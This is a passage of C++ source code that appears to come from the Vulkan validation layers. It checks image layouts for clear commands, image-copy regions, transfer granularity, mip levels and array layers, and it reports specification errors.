Return correct number of layers taking into account VK_REMAINING_ARRAY_LAYERS uint32_t array_layer_count = range->layerCount; if (range->layerCount == VK_REMAINING_ARRAY_LAYERS) { array_layer_count = layers - range->baseArrayLayer; } return array_layer_count; } bool CoreChecks::VerifyClearImageLayout(GLOBAL_CB_NODE *cb_node, IMAGE_STATE *image_state, VkImageSubresourceRange range, VkImageLayout dest_image_layout, const char *func_name) { bool skip = false; uint32_t level_count = ResolveRemainingLevels(&range, image_state->createInfo.mipLevels); uint32_t layer_count = ResolveRemainingLayers(&range, image_state->createInfo.arrayLayers); if (dest_image_layout != VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL) { if (dest_image_layout == VK_IMAGE_LAYOUT_GENERAL) { if (image_state->createInfo.tiling != VK_IMAGE_TILING_LINEAR) { // LAYOUT_GENERAL is allowed, but may not be performance optimal, flag as perf warning. skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), kVUID_Core_DrawState_InvalidImageLayout, "%s: Layout for cleared image should be TRANSFER_DST_OPTIMAL instead of GENERAL.", func_name); } } else if (VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR == dest_image_layout) { if (!GetDeviceExtensions()->vk_khr_shared_presentable_image) { // TODO: Add unique error id when available. skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), 0, "Must enable VK_KHR_shared_presentable_image extension before creating images with a layout type " "of VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR."); } else { if (image_state->shared_presentable) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), 0, "Layout for shared presentable cleared image is %s but can only be VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR.", string_VkImageLayout(dest_image_layout)); } } } else { const char *error_code = "VUID-vkCmdClearColorImage-imageLayout-00005"; if (strcmp(func_name, "vkCmdClearDepthStencilImage()") == 0) { error_code = "VUID-vkCmdClearDepthStencilImage-imageLayout-00012"; } else { assert(strcmp(func_name, "vkCmdClearColorImage()") == 0); } skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), error_code, "%s: Layout for cleared image is %s but can only be TRANSFER_DST_OPTIMAL or GENERAL.", func_name, string_VkImageLayout(dest_image_layout)); } } for (uint32_t level_index = 0; level_index < level_count; ++level_index) { uint32_t level = level_index + range.baseMipLevel; for (uint32_t layer_index = 0; layer_index < layer_count; ++layer_index) { uint32_t layer = layer_index + range.baseArrayLayer; VkImageSubresource sub = {range.aspectMask, level, layer}; IMAGE_CMD_BUF_LAYOUT_NODE node; if (FindCmdBufLayout(cb_node, image_state->image, sub, node)) { if (node.layout != dest_image_layout) { const char *error_code = "VUID-vkCmdClearColorImage-imageLayout-00004"; if (strcmp(func_name, "vkCmdClearDepthStencilImage()") == 0) { error_code = "VUID-vkCmdClearDepthStencilImage-imageLayout-00011"; } else { assert(strcmp(func_name, "vkCmdClearColorImage()") == 0); } skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, 0, error_code, "%s: Cannot clear an image whose layout is %s and doesn't match the current layout %s.", func_name, string_VkImageLayout(dest_image_layout), string_VkImageLayout(node.layout)); } } } } return skip; } void CoreChecks::RecordClearImageLayout(GLOBAL_CB_NODE *cb_node, VkImage image, VkImageSubresourceRange range, VkImageLayout dest_image_layout) { VkImageCreateInfo *image_create_info = &(GetImageState(image)->createInfo); uint32_t level_count = ResolveRemainingLevels(&range, image_create_info->mipLevels); uint32_t layer_count = ResolveRemainingLayers(&range, image_create_info->arrayLayers); for (uint32_t level_index = 0; level_index < level_count; ++level_index) { uint32_t level = level_index + range.baseMipLevel; for (uint32_t layer_index = 0; layer_index < layer_count; ++layer_index) { uint32_t layer = layer_index + range.baseArrayLayer; VkImageSubresource sub = {range.aspectMask, level, layer}; IMAGE_CMD_BUF_LAYOUT_NODE node; if (!FindCmdBufLayout(cb_node, image, sub, node)) { SetLayout(cb_node, image, sub, IMAGE_CMD_BUF_LAYOUT_NODE(dest_image_layout, dest_image_layout)); } } } } bool CoreChecks::PreCallValidateCmdClearColorImage(VkCommandBuffer commandBuffer, VkImage image, VkImageLayout imageLayout, const VkClearColorValue *pColor, uint32_t rangeCount, const VkImageSubresourceRange *pRanges) { bool skip = false; // TODO : Verify memory is in VK_IMAGE_STATE_CLEAR state auto cb_node = GetCBNode(commandBuffer); auto image_state = GetImageState(image); if (cb_node && image_state) { skip |= ValidateMemoryIsBoundToImage(image_state, "vkCmdClearColorImage()", "VUID-vkCmdClearColorImage-image-00003"); skip |= ValidateCmdQueueFlags(cb_node, "vkCmdClearColorImage()", VK_QUEUE_GRAPHICS_BIT | VK_QUEUE_COMPUTE_BIT, "VUID-vkCmdClearColorImage-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_CLEARCOLORIMAGE, "vkCmdClearColorImage()"); if (GetApiVersion() >= VK_API_VERSION_1_1 || GetDeviceExtensions()->vk_khr_maintenance1) { skip |= ValidateImageFormatFeatureFlags(image_state, VK_FORMAT_FEATURE_TRANSFER_DST_BIT, "vkCmdClearColorImage", "VUID-vkCmdClearColorImage-image-01993", "VUID-vkCmdClearColorImage-image-01993"); } skip |= InsideRenderPass(cb_node, "vkCmdClearColorImage()", "VUID-vkCmdClearColorImage-renderpass"); for (uint32_t i = 0; i < rangeCount; ++i) { std::string param_name = "pRanges[" + std::to_string(i) + "]"; skip |= ValidateCmdClearColorSubresourceRange(image_state, pRanges[i], param_name.c_str()); skip |= ValidateImageAttributes(image_state, pRanges[i]); skip |= VerifyClearImageLayout(cb_node, image_state, pRanges[i], imageLayout, "vkCmdClearColorImage()"); } } return skip; } void CoreChecks::PreCallRecordCmdClearColorImage(VkCommandBuffer commandBuffer, VkImage image, VkImageLayout imageLayout, const VkClearColorValue *pColor, uint32_t rangeCount, const VkImageSubresourceRange *pRanges) { auto cb_node = GetCBNode(commandBuffer); auto image_state = GetImageState(image); if (cb_node && image_state) { AddCommandBufferBindingImage(cb_node, image_state); for (uint32_t i = 0; i < rangeCount; ++i) { RecordClearImageLayout(cb_node, image, pRanges[i], imageLayout); } } } bool CoreChecks::PreCallValidateCmdClearDepthStencilImage(VkCommandBuffer commandBuffer, VkImage image, VkImageLayout imageLayout, const VkClearDepthStencilValue *pDepthStencil, uint32_t rangeCount, const VkImageSubresourceRange *pRanges) { bool skip = false; // TODO : Verify memory is in VK_IMAGE_STATE_CLEAR state auto cb_node = GetCBNode(commandBuffer); auto image_state = GetImageState(image); if (cb_node && image_state) { skip |= ValidateMemoryIsBoundToImage(image_state, "vkCmdClearDepthStencilImage()", "VUID-vkCmdClearDepthStencilImage-image-00010"); skip |= ValidateCmdQueueFlags(cb_node, "vkCmdClearDepthStencilImage()", VK_QUEUE_GRAPHICS_BIT, "VUID-vkCmdClearDepthStencilImage-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_CLEARDEPTHSTENCILIMAGE, "vkCmdClearDepthStencilImage()"); if (GetApiVersion() >= VK_API_VERSION_1_1 || GetDeviceExtensions()->vk_khr_maintenance1) { skip |= ValidateImageFormatFeatureFlags(image_state, VK_FORMAT_FEATURE_TRANSFER_DST_BIT, "vkCmdClearDepthStencilImage", "VUID-vkCmdClearDepthStencilImage-image-01994", "VUID-vkCmdClearDepthStencilImage-image-01994"); } skip |= InsideRenderPass(cb_node, "vkCmdClearDepthStencilImage()", "VUID-vkCmdClearDepthStencilImage-renderpass"); for (uint32_t i = 0; i < rangeCount; ++i) { std::string param_name = "pRanges[" + std::to_string(i) + "]"; skip |= ValidateCmdClearDepthSubresourceRange(image_state, pRanges[i], param_name.c_str()); skip |= VerifyClearImageLayout(cb_node, image_state, pRanges[i], imageLayout, "vkCmdClearDepthStencilImage()"); // Image aspect must be depth or stencil or both VkImageAspectFlags valid_aspects = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; if (((pRanges[i].aspectMask & valid_aspects) == 0) || ((pRanges[i].aspectMask & ~valid_aspects) != 0)) { char const str[] = "vkCmdClearDepthStencilImage aspectMasks for all subresource ranges must be set to VK_IMAGE_ASPECT_DEPTH_BIT " "and/or VK_IMAGE_ASPECT_STENCIL_BIT"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(commandBuffer), kVUID_Core_DrawState_InvalidImageAspect, str); } } if (image_state && !FormatIsDepthOrStencil(image_state->createInfo.format)) { char const str[] = "vkCmdClearDepthStencilImage called without a depth/stencil image."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkCmdClearDepthStencilImage-image-00014", "%s.", str); } if (VK_IMAGE_USAGE_TRANSFER_DST_BIT != (VK_IMAGE_USAGE_TRANSFER_DST_BIT & image_state->createInfo.usage)) { char const str[] = "vkCmdClearDepthStencilImage() called with an image that was not created with the VK_IMAGE_USAGE_TRANSFER_DST_BIT " "set."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkCmdClearDepthStencilImage-image-00009", "%s.", str); } } return skip; } void CoreChecks::PreCallRecordCmdClearDepthStencilImage(VkCommandBuffer commandBuffer, VkImage image, VkImageLayout imageLayout, const VkClearDepthStencilValue *pDepthStencil, uint32_t rangeCount, const VkImageSubresourceRange *pRanges) { auto cb_node = GetCBNode(commandBuffer); auto image_state = GetImageState(image); if (cb_node && image_state) { AddCommandBufferBindingImage(cb_node, image_state); for (uint32_t i = 0; i < rangeCount; ++i) { RecordClearImageLayout(cb_node, image, pRanges[i], imageLayout); } } } // Returns true if [x, xoffset] and [y, yoffset] overlap static bool RangesIntersect(int32_t start, uint32_t start_offset, int32_t end, uint32_t end_offset) { bool result = false; uint32_t intersection_min = std::max(static_cast<uint32_t>(start), static_cast<uint32_t>(end)); uint32_t intersection_max = std::min(static_cast<uint32_t>(start) + start_offset, static_cast<uint32_t>(end) + end_offset); if (intersection_max > intersection_min) { result = true; } return result; } // Returns true if source area of first copy region intersects dest area of second region // It is assumed that these are copy regions within a single image (otherwise no possibility of collision) static bool RegionIntersects(const VkImageCopy *rgn0, const VkImageCopy *rgn1, VkImageType type, bool is_multiplane) { bool result = false; // Separate planes within a multiplane image cannot intersect if (is_multiplane && (rgn0->srcSubresource.aspectMask != rgn1->dstSubresource.aspectMask)) { return result; } if ((rgn0->srcSubresource.mipLevel == rgn1->dstSubresource.mipLevel) && (RangesIntersect(rgn0->srcSubresource.baseArrayLayer, rgn0->srcSubresource.layerCount, rgn1->dstSubresource.baseArrayLayer, rgn1->dstSubresource.layerCount))) { result = true; switch (type) { case VK_IMAGE_TYPE_3D: result &= RangesIntersect(rgn0->srcOffset.z, rgn0->extent.depth, rgn1->dstOffset.z, rgn1->extent.depth); // fall through case VK_IMAGE_TYPE_2D: result &= RangesIntersect(rgn0->srcOffset.y, rgn0->extent.height, rgn1->dstOffset.y, rgn1->extent.height); // fall through case VK_IMAGE_TYPE_1D: result &= RangesIntersect(rgn0->srcOffset.x, rgn0->extent.width, rgn1->dstOffset.x, rgn1->extent.width); break; default: // Unrecognized or new IMAGE_TYPE enums will be caught in parameter_validation assert(false); } } return result; } // Returns non-zero if offset and extent exceed image extents static const uint32_t x_bit = 1; static const uint32_t y_bit = 2; static const uint32_t z_bit = 4; static uint32_t ExceedsBounds(const VkOffset3D *offset, const VkExtent3D *extent, const VkExtent3D *image_extent) { uint32_t result = 0; // Extents/depths cannot be negative but checks left in for clarity if ((offset->z + extent->depth > image_extent->depth) || (offset->z < 0) || ((offset->z + static_cast<int32_t>(extent->depth)) < 0)) { result |= z_bit; } if ((offset->y + extent->height > image_extent->height) || (offset->y < 0) || ((offset->y + static_cast<int32_t>(extent->height)) < 0)) { result |= y_bit; } if ((offset->x + extent->width > image_extent->width) || (offset->x < 0) || ((offset->x + static_cast<int32_t>(extent->width)) < 0)) { result |= x_bit; } return result; } // Test if two VkExtent3D structs are equivalent static inline bool IsExtentEqual(const VkExtent3D *extent, const VkExtent3D *other_extent) { bool result = true; if ((extent->width != other_extent->width) || (extent->height != other_extent->height) || (extent->depth != other_extent->depth)) { result = false; } return result; } // For image copies between compressed/uncompressed formats, the extent is provided in source image texels // Destination image texel extents must be adjusted by block size for the dest validation checks VkExtent3D GetAdjustedDestImageExtent(VkFormat src_format, VkFormat dst_format, VkExtent3D extent) { VkExtent3D adjusted_extent = extent; if ((FormatIsCompressed(src_format) && (!FormatIsCompressed(dst_format)))) { VkExtent3D block_size = FormatTexelBlockExtent(src_format); adjusted_extent.width /= block_size.width; adjusted_extent.height /= block_size.height; adjusted_extent.depth /= block_size.depth; } else if ((!FormatIsCompressed(src_format) && (FormatIsCompressed(dst_format)))) { VkExtent3D block_size = FormatTexelBlockExtent(dst_format); adjusted_extent.width *= block_size.width; adjusted_extent.height *= block_size.height; adjusted_extent.depth *= block_size.depth; } return adjusted_extent; } // Returns the effective extent of an image subresource, adjusted for mip level and array depth. static inline VkExtent3D GetImageSubresourceExtent(const IMAGE_STATE *img, const VkImageSubresourceLayers *subresource) { const uint32_t mip = subresource->mipLevel; // Return zero extent if mip level doesn't exist if (mip >= img->createInfo.mipLevels) { return VkExtent3D{0, 0, 0}; } // Don't allow mip adjustment to create 0 dim, but pass along a 0 if that's what subresource specified VkExtent3D extent = img->createInfo.extent; // If multi-plane, adjust per-plane extent if (FormatIsMultiplane(img->createInfo.format)) { VkExtent2D divisors = FindMultiplaneExtentDivisors(img->createInfo.format, subresource->aspectMask); extent.width /= divisors.width; extent.height /= divisors.height; } if (img->createInfo.flags & VK_IMAGE_CREATE_CORNER_SAMPLED_BIT_NV) { extent.width = (0 == extent.width ? 0 : std::max(2U, 1 + ((extent.width - 1) >> mip))); extent.height = (0 == extent.height ? 0 : std::max(2U, 1 + ((extent.height - 1) >> mip))); extent.depth = (0 == extent.depth ? 0 : std::max(2U, 1 + ((extent.depth - 1) >> mip))); } else { extent.width = (0 == extent.width ? 0 : std::max(1U, extent.width >> mip)); extent.height = (0 == extent.height ? 0 : std::max(1U, extent.height >> mip)); extent.depth = (0 == extent.depth ? 0 : std::max(1U, extent.depth >> mip)); } // Image arrays have an effective z extent that isn't diminished by mip level if (VK_IMAGE_TYPE_3D != img->createInfo.imageType) { extent.depth = img->createInfo.arrayLayers; } return extent; } // Test if the extent argument has all dimensions set to 0. static inline bool IsExtentAllZeroes(const VkExtent3D *extent) { return ((extent->width == 0) && (extent->height == 0) && (extent->depth == 0)); } // Test if the extent argument has any dimensions set to 0. static inline bool IsExtentSizeZero(const VkExtent3D *extent) { return ((extent->width == 0) || (extent->height == 0) || (extent->depth == 0)); } // Returns the image transfer granularity for a specific image scaled by compressed block size if necessary. VkExtent3D CoreChecks::GetScaledItg(const GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *img) { // Default to (0, 0, 0) granularity in case we can't find the real granularity for the physical device. VkExtent3D granularity = {0, 0, 0}; auto pPool = GetCommandPoolNode(cb_node->createInfo.commandPool); if (pPool) { granularity = GetPhysicalDeviceState()->queue_family_properties[pPool->queueFamilyIndex].minImageTransferGranularity; if (FormatIsCompressed(img->createInfo.format)) { auto block_size = FormatTexelBlockExtent(img->createInfo.format); granularity.width *= block_size.width; granularity.height *= block_size.height; } } return granularity; } // Test elements of a VkExtent3D structure against alignment constraints contained in another VkExtent3D structure static inline bool IsExtentAligned(const VkExtent3D *extent, const VkExtent3D *granularity) { bool valid = true; if ((SafeModulo(extent->depth, granularity->depth) != 0) || (SafeModulo(extent->width, granularity->width) != 0) || (SafeModulo(extent->height, granularity->height) != 0)) { valid = false; } return valid; } // Check elements of a VkOffset3D structure against a queue family's Image Transfer Granularity values bool CoreChecks::CheckItgOffset(const GLOBAL_CB_NODE *cb_node, const VkOffset3D *offset, const VkExtent3D *granularity, const uint32_t i, const char *function, const char *member, const char *vuid) { bool skip = false; VkExtent3D offset_extent = {}; offset_extent.width = static_cast<uint32_t>(abs(offset->x)); offset_extent.height = static_cast<uint32_t>(abs(offset->y)); offset_extent.depth = static_cast<uint32_t>(abs(offset->z)); if (IsExtentAllZeroes(granularity)) { // If the queue family image transfer granularity is (0, 0, 0), then the offset must always be (0, 0, 0) if (IsExtentAllZeroes(&offset_extent) == false) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), vuid, "%s: pRegion[%d].%s (x=%d, y=%d, z=%d) must be (x=0, y=0, z=0) when the command buffer's queue family " "image transfer granularity is (w=0, h=0, d=0).", function, i, member, offset->x, offset->y, offset->z); } } else { // If the queue family image transfer granularity is not (0, 0, 0), then the offset dimensions must always be even // integer multiples of the image transfer granularity. if (IsExtentAligned(&offset_extent, granularity) == false) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), vuid, "%s: pRegion[%d].%s (x=%d, y=%d, z=%d) dimensions must be even integer multiples of this command " "buffer's queue family image transfer granularity (w=%d, h=%d, d=%d).", function, i, member, offset->x, offset->y, offset->z, granularity->width, granularity->height, granularity->depth); } } return skip; } // Check elements of a VkExtent3D structure against a queue family's Image Transfer Granularity values bool CoreChecks::CheckItgExtent(const GLOBAL_CB_NODE *cb_node, const VkExtent3D *extent, const VkOffset3D *offset, const VkExtent3D *granularity, const VkExtent3D *subresource_extent, const VkImageType image_type, const uint32_t i, const char *function, const char *member, const char *vuid) { bool skip = false; if (IsExtentAllZeroes(granularity)) { // If the queue family image transfer granularity is (0, 0, 0), then the extent must always match the image // subresource extent. if (IsExtentEqual(extent, subresource_extent) == false) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), vuid, "%s: pRegion[%d].%s (w=%d, h=%d, d=%d) must match the image subresource extents (w=%d, h=%d, d=%d) " "when the command buffer's queue family image transfer granularity is (w=0, h=0, d=0).", function, i, member, extent->width, extent->height, extent->depth, subresource_extent->width, subresource_extent->height, subresource_extent->depth); } } else { // If the queue family image transfer granularity is not (0, 0, 0), then the extent dimensions must always be even // integer multiples of the image transfer granularity or the offset + extent dimensions must always match the image // subresource extent dimensions. VkExtent3D offset_extent_sum = {}; offset_extent_sum.width = static_cast<uint32_t>(abs(offset->x)) + extent->width; offset_extent_sum.height = static_cast<uint32_t>(abs(offset->y)) + extent->height; offset_extent_sum.depth = static_cast<uint32_t>(abs(offset->z)) + extent->depth; bool x_ok = true; bool y_ok = true; bool z_ok = true; switch (image_type) { case VK_IMAGE_TYPE_3D: z_ok = ((0 == SafeModulo(extent->depth, granularity->depth)) || (subresource_extent->depth == offset_extent_sum.depth)); // fall through case VK_IMAGE_TYPE_2D: y_ok = ((0 == SafeModulo(extent->height, granularity->height)) || (subresource_extent->height == offset_extent_sum.height)); // fall through case VK_IMAGE_TYPE_1D: x_ok = ((0 == SafeModulo(extent->width, granularity->width)) || (subresource_extent->width == offset_extent_sum.width)); break; default: // Unrecognized or new IMAGE_TYPE enums will be caught in parameter_validation assert(false); } if (!(x_ok && y_ok && z_ok)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), vuid, "%s: pRegion[%d].%s (w=%d, h=%d, d=%d) dimensions must be even integer multiples of this command " "buffer's queue family image transfer granularity (w=%d, h=%d, d=%d) or offset (x=%d, y=%d, z=%d) + " "extent (w=%d, h=%d, d=%d) must match the image subresource extents (w=%d, h=%d, d=%d).", function, i, member, extent->width, extent->height, extent->depth, granularity->width, granularity->height, granularity->depth, offset->x, offset->y, offset->z, extent->width, extent->height, extent->depth, subresource_extent->width, subresource_extent->height, subresource_extent->depth); } } return skip; } bool CoreChecks::ValidateImageMipLevel(const GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *img, uint32_t mip_level, const uint32_t i, const char *function, const char *member, const char *vuid) { bool skip = false; if (mip_level >= img->createInfo.mipLevels) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), vuid, "In %s, pRegions[%u].%s.mipLevel is %u, but provided image %s has %u mip levels.", function, i, member, mip_level, report_data->FormatHandle(img->image).c_str(), img->createInfo.mipLevels); } return skip; } bool CoreChecks::ValidateImageArrayLayerRange(const GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *img, const uint32_t base_layer, const uint32_t layer_count, const uint32_t i, const char *function, const char *member, const char *vuid) { bool skip = false; if (base_layer >= img->createInfo.arrayLayers || layer_count > img->createInfo.arrayLayers || (base_layer + layer_count) > img->createInfo.arrayLayers) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), vuid, "In %s, pRegions[%u].%s.baseArrayLayer is %u and .layerCount is " "%u, but provided image %s has %u array layers.", function, i, member, base_layer, layer_count, report_data->FormatHandle(img->image).c_str(), img->createInfo.arrayLayers); } return skip; } // Check valid usage Image Transfer Granularity requirements for elements of a VkBufferImageCopy structure bool CoreChecks::ValidateCopyBufferImageTransferGranularityRequirements(const GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *img, const VkBufferImageCopy *region, const uint32_t i, const char *function, const char *vuid) { bool skip = false; VkExtent3D granularity = GetScaledItg(cb_node, img); skip |= CheckItgOffset(cb_node, &region->imageOffset, &granularity, i, function, "imageOffset", vuid); VkExtent3D subresource_extent = GetImageSubresourceExtent(img, &region->imageSubresource); skip |= CheckItgExtent(cb_node, &region->imageExtent, &region->imageOffset, &granularity, &subresource_extent, img->createInfo.imageType, i, function, "imageExtent", vuid); return skip; } // Check valid usage Image Transfer Granularity requirements for elements of a VkImageCopy structure bool CoreChecks::ValidateCopyImageTransferGranularityRequirements(const GLOBAL_CB_NODE *cb_node, const IMAGE_STATE *src_img, const IMAGE_STATE *dst_img, const VkImageCopy *region, const uint32_t i, const char *function) { bool skip = false; // Source image checks VkExtent3D granularity = GetScaledItg(cb_node, src_img); skip |= CheckItgOffset(cb_node, &region->srcOffset, &granularity, i, function, "srcOffset", "VUID-vkCmdCopyImage-srcOffset-01783"); VkExtent3D subresource_extent = GetImageSubresourceExtent(src_img, &region->srcSubresource); const VkExtent3D extent = region->extent; skip |= CheckItgExtent(cb_node, &extent, &region->srcOffset, &granularity, &subresource_extent, src_img->createInfo.imageType, i, function, "extent", "VUID-vkCmdCopyImage-srcOffset-01783"); // Destination image checks granularity = GetScaledItg(cb_node, dst_img); skip |= CheckItgOffset(cb_node, &region->dstOffset, &granularity, i, function, "dstOffset", "VUID-vkCmdCopyImage-dstOffset-01784"); // Adjust dest extent, if necessary const VkExtent3D dest_effective_extent = GetAdjustedDestImageExtent(src_img->createInfo.format, dst_img->createInfo.format, extent); subresource_extent = GetImageSubresourceExtent(dst_img, &region->dstSubresource); skip |= CheckItgExtent(cb_node, &dest_effective_extent, &region->dstOffset, &granularity, &subresource_extent, dst_img->createInfo.imageType, i, function, "extent", "VUID-vkCmdCopyImage-dstOffset-01784"); return skip; } // Validate contents of a VkImageCopy struct bool CoreChecks::ValidateImageCopyData(const uint32_t regionCount, const VkImageCopy *ic_regions, const IMAGE_STATE *src_state, const IMAGE_STATE *dst_state) { bool skip = false; for (uint32_t i = 0; i < regionCount; i++) { const VkImageCopy region = ic_regions[i]; // For comp<->uncomp copies, the copy extent for the dest image must be adjusted const VkExtent3D src_copy_extent = region.extent; const VkExtent3D dst_copy_extent = GetAdjustedDestImageExtent(src_state->createInfo.format, dst_state->createInfo.format, region.extent); bool slice_override = false; uint32_t depth_slices = 0; // Special case for copying between a 1D/2D array and a 3D image // TBD: This seems like the only way to reconcile 3 mutually-exclusive VU checks for 2D/3D copies. Heads up. if ((VK_IMAGE_TYPE_3D == src_state->createInfo.imageType) && (VK_IMAGE_TYPE_3D != dst_state->createInfo.imageType)) { depth_slices = region.dstSubresource.layerCount; // Slice count from 2D subresource slice_override = (depth_slices != 1); } else if ((VK_IMAGE_TYPE_3D == dst_state->createInfo.imageType) && (VK_IMAGE_TYPE_3D != src_state->createInfo.imageType)) { depth_slices = region.srcSubresource.layerCount; // Slice count from 2D subresource slice_override = (depth_slices != 1); } // Do all checks on source image // if (src_state->createInfo.imageType == VK_IMAGE_TYPE_1D) { if ((0 != region.srcOffset.y) || (1 != src_copy_extent.height)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), "VUID-VkImageCopy-srcImage-00146", "vkCmdCopyImage(): pRegion[%d] srcOffset.y is %d and extent.height is %d. For 1D images these must " "be 0 and 1, respectively.", i, region.srcOffset.y, src_copy_extent.height); } } // VUID-VkImageCopy-srcImage-01785 if ((src_state->createInfo.imageType == VK_IMAGE_TYPE_1D) && ((0 != region.srcOffset.z) || (1 != src_copy_extent.depth))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), "VUID-VkImageCopy-srcImage-01785", "vkCmdCopyImage(): pRegion[%d] srcOffset.z is %d and extent.depth is %d. For 1D images " "these must be 0 and 1, respectively.", i, region.srcOffset.z, src_copy_extent.depth); } // VUID-VkImageCopy-srcImage-01787 if ((src_state->createInfo.imageType == VK_IMAGE_TYPE_2D) && (0 != region.srcOffset.z)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), "VUID-VkImageCopy-srcImage-01787", "vkCmdCopyImage(): pRegion[%d] srcOffset.z is %d. For 2D images the z-offset must be 0.", i, region.srcOffset.z); } if (GetDeviceExtensions()->vk_khr_maintenance1) { if (src_state->createInfo.imageType == VK_IMAGE_TYPE_3D) { if ((0 != region.srcSubresource.baseArrayLayer) || (1 != region.srcSubresource.layerCount)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), "VUID-VkImageCopy-srcImage-00141", "vkCmdCopyImage(): pRegion[%d] srcSubresource.baseArrayLayer is %d and srcSubresource.layerCount " "is %d. For VK_IMAGE_TYPE_3D images these must be 0 and 1, respectively.", i, region.srcSubresource.baseArrayLayer, region.srcSubresource.layerCount); } } } else { // Pre maint 1 if (src_state->createInfo.imageType == VK_IMAGE_TYPE_3D || dst_state->createInfo.imageType == VK_IMAGE_TYPE_3D) { if ((0 != region.srcSubresource.baseArrayLayer) || (1 != region.srcSubresource.layerCount)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), "VUID-VkImageCopy-srcImage-00141", "vkCmdCopyImage(): pRegion[%d] srcSubresource.baseArrayLayer is %d and " "srcSubresource.layerCount is %d. For copies with either source or dest of type " "VK_IMAGE_TYPE_3D, these must be 0 and 1, respectively.", i, region.srcSubresource.baseArrayLayer, region.srcSubresource.layerCount); } } } // Source checks that apply only to compressed images (or to _422 images if ycbcr enabled) bool ext_ycbcr = GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion; if (FormatIsCompressed(src_state->createInfo.format) || (ext_ycbcr && FormatIsSinglePlane_422(src_state->createInfo.format))) { const VkExtent3D block_size = FormatTexelBlockExtent(src_state->createInfo.format); // image offsets must be multiples of block dimensions if ((SafeModulo(region.srcOffset.x, block_size.width) != 0) || (SafeModulo(region.srcOffset.y, block_size.height) != 0) || (SafeModulo(region.srcOffset.z, block_size.depth) != 0)) { const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-srcImage-01727" : "VUID-VkImageCopy-srcOffset-00157"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(src_state->image), vuid, "vkCmdCopyImage(): pRegion[%d] srcOffset (%d, %d) must be multiples of the compressed image's " "texel width & height (%d, %d).", i, region.srcOffset.x, region.srcOffset.y, block_size.width, block_size.height); } const VkExtent3D mip_extent = GetImageSubresourceExtent(src_state, &(region.srcSubresource)); if ((SafeModulo(src_copy_extent.width, block_size.width) != 0) && (src_copy_extent.width + region.srcOffset.x != mip_extent.width)) { const char *vuid = ext_ycbcr ? "VUID-VkImageCopy-srcImage-01728" : "VUID-VkImageCopy-extent-00158"; skip |= 